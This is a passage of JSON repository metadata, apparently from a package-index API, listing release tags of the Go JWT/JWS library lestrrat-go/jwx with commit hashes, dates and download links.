/codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.24","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.24/manifests"},{"name":"v2.0.0","sha":"8f97f606570bc3de90005ce3188824e7e7eff88a","kind":"commit","published_at":"2022-04-24T04:18:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0/manifests"},{"name":"v2.0.0-beta2","sha":"fd8fafc9fe0a7310d9dec456168a452d571c16b0","kind":"commit","published_at":"2022-04-16T06:50:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta2/manifests"},{"name":"v1.2.23","sha":"baba5610e7fb53402e23c955edc10dbb25d73275","kind":"commit","published_at":"2022-04-13T09:52:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.23","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.23/manifests"},{"name":"v2.0.0-beta1","sha":"0258045345942aed8b8694da94cfb5ab4dd3261c","kind":"commit","published_at":"2022-04-09T13:16:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-beta1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-beta1/manifests"},{"name":"v1.2.22","sha":"f4701e19d38b7fd1ede0ef785867e078016b516e","kind":"commit","published_at":"2022-04-08T11:18:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.22","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.22/manifests"},{"name":"v2.0.0-alpha1","sha":"8a69aa2dd6b9a7a8284584cdd23acd96613c0866","kind":"commit","published_at":"2022-04-03T23:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.0.0-alpha1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.0.0-alpha1/manifests"},{"name":"v1.2.21","sha":"7b28f4c7fabe44249b77e058e5ca33c82b599d5e","kind":"commit","published_at":"2022-03-29T22:49:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.21","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.21/manifests"},{"name":"v1.2.20","sha":"3fa12c9bedcebd03db23f61cfb65ae0b040bf211","kind":"commit","published_at":"2022-03-03T05:56:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.20","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.20/manifests"},{"name":"v1.2.19","sha":"1c0a87feccf45c59a54ee3c9f2a995ab777953e7","kind":"commit","published_at":"2022-02-22T01:40:38.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.19","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.19/manifests"},{"name":"v1.2.18","sha":"2ab72de258ac966aeec3cfb836209692ed345586","kind":"commit","published_at":"2022-01-23T00:22:42.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.18","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.18/manifests"},{"name":"v1.2.17","sha":"300b79a15b99559ba7ad22e4275ecc99a07c359b","kind":"commit","published_at":"2022-01-12T10:10:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.17","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.17/manifests"},{"name":"v1.2.16","sha":"9349cc843391834794d593c4daa1345de1ab357e","kind":"commit","published_at":"2022-01-12T05:29:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.16","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.16/manifests"},{"name":"v1.2.15","sha":"5ded25fd0bf8f759a96a7ae3937df829d8e4777d","kind":"commit","published_at":"2022-01-06T23:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.15","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.15/manifests"},{"name":"v1.2.14","sha":"de7d9bca43812abc4f630320f8632108ccfe34bf","kind":"commit","published_at":"2021-12-22T01:34:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.14","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.14/manifests"},{"name":"v1.2.13","sha":"59f4c03c3e0aeb44f6b6a57fd96b90f9a679f880","kind":"commit","published_at":"2021-12-07T02:59:52.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.13/manifests"},{"name":"v1.2.12","sha":"45e532bbe4ada174b16f5f170ea62d2c8d83ef77","kind":"commit","published_at":"2021-12-01T06:52:40.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.12/manifests"},{"name":"v1.2.11","sha":"e371adc10f659fa05b064274ff549a8e0353d2b6","kind":"commit","published_at":"2021-11-13T15:34:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.11/manifests"},{"name":"v1.2.10","sha":"09a4d070eb0ec840a33597a67a17e6cddb53da87","kind":"commit","published_at":"2021-11-09T09:16:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.10/manifests"},{"name":"v1.2.9","sha":"b2da2238b7b342a8889470b901ef3024dfc0712a","kind":"commit","published_at":"2021-10-26T01:00:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.9/manifests"},{"name":"v1.2.8","sha":"f2bdd8c9df46d61fe987fa36bcc87c58ef846046","kind":"commit","published_at":"2021-10-21T01:23:06.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.8/manifests"},{"name":"v1.2.7","sha":"b9292016a6572dce779109d8da8d813b85abb658","kind":"commit","published_at":"2021-09-26T06:08:18.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.7/manifests"},{"name":"v1.2.6","sha":"41b30b67e905482292496e528119fc7482482ab3","kind":"commit","published_at":"2021-08-24T07:56:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.6/manifests"},{"name":"v1.2.5","sha":"551083cda79fd07493bf0db6e825278dd88c1fc3","kind":"commit","published_at":"2021-08-04T12:17:57.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.5/manifests"},{"name":"v1.2.4","sha":"d01528f5e5ae3221a48f67570928867e98184bbd","kind":"commit","published_at":"2021-07-15T13:26:23.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.4/manifests"},{"name":"v1.2.3","sha":"5e2de6ea11b5112bdf1a5e088d56c9c2e7fb6807","kind":"commit","published_at":"2021-07-15T09:53:13.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.3/manifests"},{"name":"v1.2.2","sha":"7159c501c5a43f8788f3a9a0961e146480c28eae","kind":"commit","published_at":"2021-07-12T23:38:00.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.2/manifests"},{"name":"v1.2.1","sha":"08de34253bc9633a11b019b143a2d212f8ff0ed8","kind":"commit","published_at":"2021-06-01T23:24:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"20fcd2aaea33121a0da375914a254615b3527c46","kind":"commit","published_at":"2021-04-29T23:40:49.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.0/manifests"},{"name":"v1.1.8-rc1","sha":"4fc7156e9562e4b51143220e830ed2d32279d2f6","kind":"commit","published_at":"2021-04-08T12:05:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.8-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.8-rc1/manifests"},{"name":"v1.1.7","sha":"db72eadbbe21fa7dc37d5628acfaa803fbf7d96e","kind":"commit","published_at":"2021-04-02T13:09:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7/manifests"},{"name":"v1.1.7-rc1","sha":"afd2d647f5892a70ab72ee14e9985ab5028bfb23","kind":"commit","published_at":"2021-03-31T06:49:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.7-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.7-rc1/manifests"},{"name":"v1.1.6","sha":"df21963ac28051061a86f9c0e9671800312e6f18","kind":"commit","published_at":"2021-03-28T07:55:51.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"b2a7484c0e863f2730d3a7a79ade1deed9e85e13","kind":"commit","published_at":"2021-03-12T04:23:47.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5/manifests"},{"name":"v1.1.5-rc1","sha":"c9a7b177e98db06f4fcd57b90ddaeab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v